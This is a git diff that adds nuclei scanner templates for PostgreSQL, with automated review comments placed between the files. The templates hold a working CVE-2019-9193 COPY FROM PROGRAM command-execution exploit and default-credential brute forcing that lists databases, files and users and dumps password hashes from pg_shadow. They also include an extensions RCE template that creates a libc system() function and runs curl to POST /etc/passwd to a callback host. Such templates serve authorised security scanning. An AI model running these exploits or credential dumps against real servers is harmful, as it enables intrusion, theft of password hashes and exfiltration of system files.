diff --git a/javascript/cves/2019/CVE-2019-9193.yaml b/javascript/cves/2019/CVE-2019-9193.yaml
new file mode 100644
index 0000000000..15d4d1b99b
--- /dev/null
+++ b/javascript/cves/2019/CVE-2019-9193.yaml
@@ -0,0 +1,53 @@
+id: CVE-2019-9193
+
+info:
+  name: PostgreSQL 9.3-12.3 Authenticated Remote Code Execution
+  author: pussycat0x
+  severity: high
+  description: |
+    In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
+  reference:
+    - https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: cve,cve2018,js,network,postgresql,intrusive
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      const tbl = tbl_exec
+      const qry = ["CREATE TABLE "+tbl+"(cmd_output text);", "COPY "+tbl + " FROM PROGRAM 'id';", "SELECT * FROM "+ tbl+";", "DROP TABLE IF EXISTS " +tbl+";",];
+      for (const x of qry){
+        connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
+        Export(connected);
+      }
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+      tbl_exec: "{{randbase(5)}}"
+
+    payloads:
+      usernames:
+        - postgres
+      database:
+        - postgres
+      password:
+        - postgres
+
+    attack: clusterbomb
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+
+      - type: word
+        words:
+          - "cmd_output"
diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml
new file mode 100644
index 0000000000..fcec534fa9
--- /dev/null
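Review bot: The tags line carries `cve2018` while the id is CVE-2019-9193, so year-based tag filters will miss this template; it should read `tags: cve,cve2019,js,network,postgresql,intrusive`. The name states a 9.3-12.3 range while the description says 9.3 through 11.2, and the two should agree. In the code block `connected` is assigned without `const`/`let` and `new postgres.PGClient` has no call parentheses; the same pattern appears in the default-db, file-read, list-database, list-password-hashes, list-users, version-detect and extensions-rce templates of this commit, whereas the empty-password template already writes `const connected = ...`, which is the form to use throughout.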
+++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml
@@ -0,0 +1,53 @@
+id: pgsql-default-db
+
+info:
+  name: Postgresql Default Database - Enumeration
+  author: pussycat0x
+  severity: high
+  description: |
+    postgres is the default database you will connect to before you have created any other databases.
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-database-name
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: js,network,postgresql,authenticated
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected = client.ConnectWithDB(Host, Port, User, Pass, Db);
+      connected ;
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+        - admin
+      password:
+        - postgres
+        -
+        - 123
+        - amber
+      database:
+        - foresight
+        - postgres
+        - template0
+        - template1
+        - test
+
+    attack: clusterbomb
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "success == true"
+          - "response == true"
+        condition: and
diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml
new file mode 100644
index 0000000000..87a21b5b03
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml
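Review bot: The bare `-` entry under `password:` parses as a YAML null rather than the empty string, so whether an empty password is actually attempted depends on how the engine renders a null payload; write `- ""` if that is the intent (the same list appears in file-read, list-database, list-password-hashes, list-users and version-detect). The name and description talk about the default `postgres` database, but what the template reports is any successful login from the username/password/database cross product, so a description such as `Checks whether a PostgreSQL server accepts a connection with common default credentials to a default or commonly named database.` would tell the reader what a match means. The trailing `connected ;` has a stray space before the semicolon.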
@@ -0,0 +1,47 @@
+id: postgresql-file-read
+
+info:
+  name: PostgreSQL File Read
+  author: pussycat0x
+  severity: high
+  description: |
+    Read and list the files within the PostgreSQL database,
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: js,network,postgresql,authenticated
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select pg_ls_dir('./');");
+      Export(connected);
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+        - admin
+      password:
+        - postgres
+        -
+        - 123
+        - amber
+      database:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[].pg_ls_dir'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml
new file mode 100644
index 0000000000..e2e82ae7b5
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml
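Review bot: The id `postgresql-file-read` does not match the file name `pgsql-file-read.yaml`, and list-database (`postgresql-list-database` in `pgsql-list-database.yaml`) and list-password-hashes (`pgsql-exec` in `pgsql-list-password-hashes.yaml`) carry the same mismatch; the templates repository pairs ids with file names, so `id: pgsql-file-read` here and the corresponding ids in the other two files. The description ends mid-sentence with a comma (`Read and list the files within the PostgreSQL database,`) and does not say what is listed; `Lists the contents of the PostgreSQL server data directory via pg_ls_dir(), which normally requires superuser-level privileges for the authenticated role.` states the finding.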
@@ -0,0 +1,48 @@
+id: postgresql-list-database
+
+info:
+  name: PostgreSQL List Database
+  author: pussycat0x
+  severity: high
+  description: |
+    A single Postgres server process can manage multiple databases at the same time. Each database is stored as a separate set of files in its own directory within the server’s data directory.
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
+    - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: js,network,postgresql,authenticated
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT datname FROM pg_database");
+      Export(connected);
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+        - admin
+      password:
+        - postgres
+        -
+        - 123
+        - amber
+      database:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[].datname'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml
new file mode 100644
index 0000000000..4e340dc902
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml
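Review bot: Both references point at password-hash material (the `#postgresql-list-password-hashes` anchor and a SCRAM-SHA-256 article) although this template only reads database names from `pg_database`; the links look copied from the list-password-hashes template and should point to the database-listing section of the same page or be dropped. The description is a general note on how Postgres stores databases and never says what the template does; `Lists the databases present on an authenticated PostgreSQL server.` would be more useful to whoever triages a match.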
@@ -0,0 +1,49 @@
+id: pgsql-exec
+
+info:
+  name: PostgreSQL List Password Hashes
+  author: pussycat0x
+  severity: high
+  description: |
+    Dump password hashes in use within a PostgreSQL database.
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes
+    - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256
+    - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: js,network,postgresql,authenticated
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename, passwd FROM pg_shadow");
+      Export(connected)
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+        - admin
+      password:
+        - postgres
+        -
+        - 123
+        - amber
+      database:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[] | "\(.usename) : \(.passwd)"'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml
new file mode 100644
index 0000000000..e456bd84f7
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml
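Review bot: The id `pgsql-exec` neither matches the file name `pgsql-list-password-hashes.yaml` nor describes what the template does; `id: pgsql-list-password-hashes` is what the rest of the directory's naming implies. The extractor writes `usename : passwd` pairs into scan output, so results from this template contain credential material (MD5 or SCRAM verifiers) and the description should say so, e.g. `Dumps role names and password verifiers from pg_shadow; scan output from this template is sensitive and should be stored accordingly.` `Export(connected)` is also the only call in the series without a terminating semicolon.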
@@ -0,0 +1,47 @@
+id: pgsql-list-users
+
+info:
+  name: PostgreSQL List Users
+  author: pussycat0x
+  severity: high
+  description: |
+    List users from Postgresql Database.
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: js,network,postgresql,enum,authenticated
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "SELECT usename FROM pg_user");
+      Export(connected);
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+        - admin
+      password:
+        - postgres
+        -
+        - 123
+        - amber
+      database:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[].usename'
\ No newline at end of file
diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml
new file mode 100644
index 0000000000..710c720a8c
--- /dev/null
+++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml
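Review bot: The `tags` line adds `enum` while the sibling templates in the same directory (default-db, file-read, list-database, list-password-hashes) omit it, so a tag filter returns an inconsistent subset of this directory; either add it to all of them or drop it here. The description `List users from Postgresql Database.` could name its source so a reader knows what the extracted values are, e.g. `Lists role names from pg_user on an authenticated PostgreSQL server.`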
@@ -0,0 +1,47 @@
+id: pgsql-version-detect
+
+info:
+  name: Postgresql Version - Detect
+  author: pussycat0x
+  severity: high
+  description: |
+    Detect Postgresql Version.
+  reference:
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-version
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: js,network,postgresql,enum,authenticated
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      connected = client.ExecuteQuery(Host, Port, User, Pass, Db, "select version();");
+      Export(connected);
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+
+    payloads:
+      usernames:
+        - postgres
+        - admin
+      password:
+        - postgres
+        -
+        - 123
+        - amber
+      database:
+        - postgres
+
+    attack: clusterbomb
+
+    extractors:
+      - type: json
+        json:
+          - '.Rows[0].version'
diff --git a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml
new file mode 100644
index 0000000000..3d6a41b46e
--- /dev/null
+++ b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml
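Review bot: `severity: high` is out of place for a version fingerprint; detection templates are conventionally `severity: info`, and the version string itself is not a finding, so either lower it or state in the description that the reported condition is the successful default-credential login rather than the version. The description `Detect Postgresql Version.` should then also say where the value comes from, e.g. `Reports the output of version() from an authenticated PostgreSQL session.` As with list-users, the `enum` tag is absent from the other enumeration templates in this directory, which makes tag-based filtering inconsistent.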
@@ -0,0 +1,51 @@
+id: pgsql-extensions-rce
+
+info:
+  name: PostgreSQL 8.1 Extensions - Remote Code Execution
+  author: pussycat0x
+  severity: high
+  description: |
+    PostgreSQL allows for extensions, which are modules providing extra functionality like functions, operators, or types. Starting from version 8.1, these extensions must be compiled with a special header for compatibility with PostgreSQL's extension mechanism.
+  reference:
+    - https://www.dionach.com/postgresql-9-x-remote-command-execution/
+    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6
+    - https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: postgresql,js,network,rce
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      const collab = shurl
+      const qry = ["CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;", "SELECT system('curl -X POST -d @/etc/passwd "+ collab +"');"];
+      for (const x of qry){
+        connected = client.ExecuteQuery(Host, Port, User, Pass, Db, x);
+        Export(connected);
+      }
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "{{usernames}}"
+      Pass: "{{password}}"
+      Db: "{{database}}"
+      shurl: http://{{interactsh-url}}
+
+    payloads:
+      usernames:
+        - postgres
+      database:
+        - postgres
+      password:
+        - postgres
+
+    attack: clusterbomb
+
+    matchers:
+      - type: regex
+        part: interactsh_request
+        regex:
+          - "root:[x*]:0:0:"
diff --git a/javascript/misconfiguration/pgsql/postgresql-empty-password.yaml b/javascript/misconfiguration/pgsql/postgresql-empty-password.yaml
new file mode 100644
index 0000000000..e319590b2d
--- /dev/null
+++ b/javascript/misconfiguration/pgsql/postgresql-empty-password.yaml
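Review bot: The template creates a C-language `system(cstring)` function in the target database and never removes it, whereas the CVE-2019-9193 template in this commit drops its scratch table; a final `DROP FUNCTION IF EXISTS system(cstring);` entry in `qry` would leave the server as it was found, and the `intrusive` tag used on that template belongs here too since the check both modifies the database and sends the server's `/etc/passwd` to the callback host. The proof of execution could use a low-sensitivity canary such as the `id` output the CVE template already matches on instead of exporting account data off-host. The description explains what extensions are but never states the condition being detected — a login privileged enough to run `CREATE FUNCTION ... LANGUAGE 'c'` — nor that the hard-coded `/lib/x86_64-linux-gnu/libc.so.6` path limits the check to hosts with that library layout, so non-matches on other systems are not negative results. The name `PostgreSQL 8.1 Extensions` is also misleading, as the text says the header requirement begins at 8.1 rather than that 8.1 is the affected version.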
@@ -0,0 +1,34 @@
+id: postgresql-empty-password
+
+info:
+  name: Postgresql Empty Password - Detect
+  author: pussycat0x
+  severity: critical
+  description: |
+    Postgresql has a flaw that allows the attacker to login with empty password.
+  reference:
+    - https://www.tenable.com/plugins/nessus/104031
+  metadata:
+    shodan-query: product:"PostgreSQL"
+    verified: true
+  tags: js,network,postgresql,authenticated
+
+javascript:
+  - code: |
+      const postgres = require('nuclei/postgres');
+      const client = new postgres.PGClient;
+      const connected = client.Connect(Host, Port, User, Pass);
+      connected;
+
+    args:
+      Host: "{{Host}}"
+      Port: 5432
+      User: "postgres"
+      Pass: ""
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "success == true"
+          - "response == true"
+        condition: and
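Review bot: The description presents an empty `postgres` password as a product flaw (`Postgresql has a flaw that allows the attacker to login with empty password.`), but what the template detects is an authentication misconfiguration — typically a role with no password set or a trust-style rule in the server's client authentication configuration; `The PostgreSQL server accepts a connection for the postgres role with an empty password, indicating a missing password or trust-based authentication.` states the finding accurately. The `authenticated` tag is questionable for a check whose point is that no credential is required. `connected;` as a bare expression statement is presumably how the result reaches the matcher; a one-line comment such as `// last expression value is the script result` would help readers unfamiliar with the nuclei JS protocol.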